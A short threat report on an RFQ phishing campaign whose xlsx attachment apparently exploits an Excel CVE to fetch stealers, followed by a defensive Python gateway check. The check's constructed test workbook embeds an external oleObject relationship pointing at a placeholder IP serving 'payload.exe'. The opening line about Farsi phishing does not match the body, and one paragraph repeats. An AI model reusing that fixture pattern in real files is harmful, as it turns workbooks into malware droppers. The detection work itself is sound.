SafeBreach Labs cybersecurity experts: the threat actor infects victims via Farsi-language phishing emails carrying a PowerShell stealer malware.
Technical analysis by the Malware Hunter JAMESWT
An RFQ email carries an as-yet-unidentified malware. The xlsx attachment exploits an Excel CVE to contact an IP address and download the payload. The link is no longer active, but during the day it served several different payloads.
A Request For Quotation (RFQ) is the lure to convey malware, currently unknown, in a global campaign.
The email's xlsx attachment, if opened, exploits an Excel CVE to contact an IP address and download the payload. At the moment the link is not active, so it was not possible to determine which family the payload belongs to. During the day, however, the same link was used to download several families: Agent Tesla, AZOrult, SnakeKeylogger, Lokibot and OskiStealer.
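The delivery mechanism above (an xlsx that reaches out to a remote IP and pulls a second-stage payload) leaves a static footprint that a mail gateway or sandbox can check before the document is ever opened. The following is an added example, not code from the report or from JAMESWT's analysis: it treats the .xlsx as the ZIP-of-XML it is, walks every relationship (`.rels`) part, and flags relationships whose `Target` is external (`TargetMode="External"` or a remote scheme) as well as any embedded object under `xl/embeddings/`. The sample workbook, the `203.0.113.10` address (a documentation-range placeholder) and the `payload.exe` name are all constructed for the example; the page names neither the CVE nor the real indicator.

```python
"""Static triage of an .xlsx attachment for external download targets.

Added example, not from the original report. Assumptions: the attachment is
an OOXML workbook (a ZIP of XML parts); an external relationship Target or an
embedded OLE object is the cheapest static sign that opening the file may
reach out to a remote host and fetch a second stage.
"""
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REMOTE_SCHEME = re.compile(r"^(https?|ftp|file):|^\\\\", re.IGNORECASE)

# Constructed sample relationship part: one external oleObject target pointing
# at a placeholder IP (TEST-NET-3), one benign relative image reference.
SAMPLE_SHEET_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
     Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
     Target="http://203.0.113.10/payload.exe" TargetMode="External"/>
  <Relationship Id="rId2"
     Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
     Target="../media/image1.png"/>
</Relationships>"""


def build_sample_xlsx() -> bytes:
    """Build a minimal constructed workbook in memory (not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", SAMPLE_SHEET_RELS)
        # Fake embedded OLE container: compound-file magic plus padding.
        z.writestr("xl/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


def is_ip_target(target: str) -> bool:
    """True when the URL host is a bare IP address rather than a hostname."""
    host = urlsplit(target).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_external_targets(xlsx_bytes: bytes) -> List[Dict[str, Optional[str]]]:
    """Collect every external relationship target and embedded object part."""
    findings: List[Dict[str, Optional[str]]] = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    external = rel.get("TargetMode", "") == "External"
                    if external or REMOTE_SCHEME.match(target):
                        findings.append({
                            "part": name,
                            "id": rel.get("Id"),
                            "type": rel.get("Type", "").rsplit("/", 1)[-1],
                            "target": target,
                        })
            elif name.startswith("xl/embeddings/"):
                findings.append({"part": name, "id": None,
                                 "type": "embedding", "target": None})
    return findings


def triage(xlsx_bytes: bytes) -> Dict[str, object]:
    """Verdict for a gateway rule: any external target or embedding is suspicious;
    an external target whose host is a bare IP is called out separately."""
    findings = find_external_targets(xlsx_bytes)
    ip_targets = [f["target"] for f in findings
                  if f["target"] and is_ip_target(f["target"])]
    return {"suspicious": bool(findings),
            "ip_targets": ip_targets,
            "findings": findings}


if __name__ == "__main__":
    verdict = triage(build_sample_xlsx())
    print("suspicious:", verdict["suspicious"])
    for f in verdict["findings"]:
        print(f"  {f['part']}: {f['type']} -> {f['target']}")
```

The check is deliberately static: it never renders the workbook, so it is safe to run on the raw attachment at the gateway, and an external `oleObject` relationship pointing at a bare IP is exactly the pattern that should route the message to a sandbox rather than a mailbox. A benign workbook with only relative targets (`../media/...`) produces no findings.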